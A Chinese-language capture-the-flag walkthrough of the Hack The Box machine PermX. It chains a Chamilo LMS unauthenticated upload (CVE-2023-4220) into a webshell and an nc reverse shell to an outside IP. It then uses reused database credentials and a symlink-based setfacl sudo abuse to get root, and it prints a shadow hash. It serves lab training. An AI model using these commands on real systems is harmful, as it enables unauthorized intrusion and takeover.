基本信息
- https://app.hackthebox.com/machines/PermX
- 10.10.11.23
data:image/s3,"s3://crabby-images/b8e67/b8e67139f258d9ab95e5fe79cea3516550425faa" alt=""
端口扫描
22和80:
1 | nmap -sC -sV 10.10.11.23 |
80
需要加hosts:
1 | 10.10.11.23 permx.htb |
在线学习平台:
data:image/s3,"s3://crabby-images/5a1bb/5a1bb8341ee2e0795fc2e4cb08e6ba86f4313990" alt=""
子域名扫描
主站没什么东西,子域名可以发现一个lms:
1 | ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://permx.htb/" -H 'Host: FUZZ.permx.htb' -fw 18 |
lms
添加hosts后访问,是一个Chamilo做的系统:
data:image/s3,"s3://crabby-images/34b73/34b732802dafe9ef8a636d5087262bc65c038222" alt=""
CVE-2023-4220
搜索可以发现Chamilo相关漏洞:
- (CVE-2023-4220) Chamilo LMS Unauthenticated Big Upload File Remote Code Execution | STAR Labs
https://starlabs.sg/advisories/23/23-4220/
按照文章中的方式获取webshell即可
1 | curl -F 'bigUploadFile=@miao.php' 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported' |
data:image/s3,"s3://crabby-images/e6524/e652446baa3a2f62c00eb1986ade31aa2816e384" alt=""
reverse shell
然后webshell执行命令获取reverse shell:
1 | 20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.10.14.16%204444%20%3E%2Ftmp%2Ff |
data:image/s3,"s3://crabby-images/0b1bf/0b1bf0db196bd1feff2396cfbb5027af211587d4" alt=""
信息
常规翻配置文件,得到数据库配置信息:
1 | $_configuration['db_host'] = 'localhost'; |
data:image/s3,"s3://crabby-images/c2984/c2984ccf48ac15c08cd74ceb1c79d12e36d79013" alt=""
user flag
基础的密码复用,mtz用户复用了数据库密码:
1 | ssh mtz@10.10.11.23 |
data:image/s3,"s3://crabby-images/b8bf9/b8bf90cb4fe0546cea34a64c2b1338c5f5ce4d79" alt=""
提权信息
mtz用户可以sudo运行指定的acl.sh文件,查看文件内容就是给指定用户指定文件权限,并且存在简单过滤,最终调用了setfacl:
- setfacl | GTFOBins
https://gtfobins.github.io/gtfobins/setfacl/
data:image/s3,"s3://crabby-images/02028/020286ad15da11c114fc631de0b3ef5f8991ae14" alt=""
很简单的逻辑,target需要以mtz用户目录开头,并且过滤了常规的..
跳转,但软链接即可绕过
提权 & root flag
做个软链接修改文件权限,例如可以修改shadow,passwd之类,然后添加个root:
1 | ln -s / miao |
data:image/s3,"s3://crabby-images/00ff2/00ff22f925f1b6e6318589ebce9218a29d258e47" alt=""
shadow
1 | root:$y$j9T$VEMcaSLaOOvSE3mYgRXRv/$tNXYdTRyCAkwoSHhlyIoCS91clvPEp/hh0r4NTBlmS7:19742:0:99999:7::: |
参考资料
- (CVE-2023-4220) Chamilo LMS Unauthenticated Big Upload File Remote Code Execution | STAR Labs
https://starlabs.sg/advisories/23/23-4220/ - setfacl | GTFOBins
https://gtfobins.github.io/gtfobins/setfacl/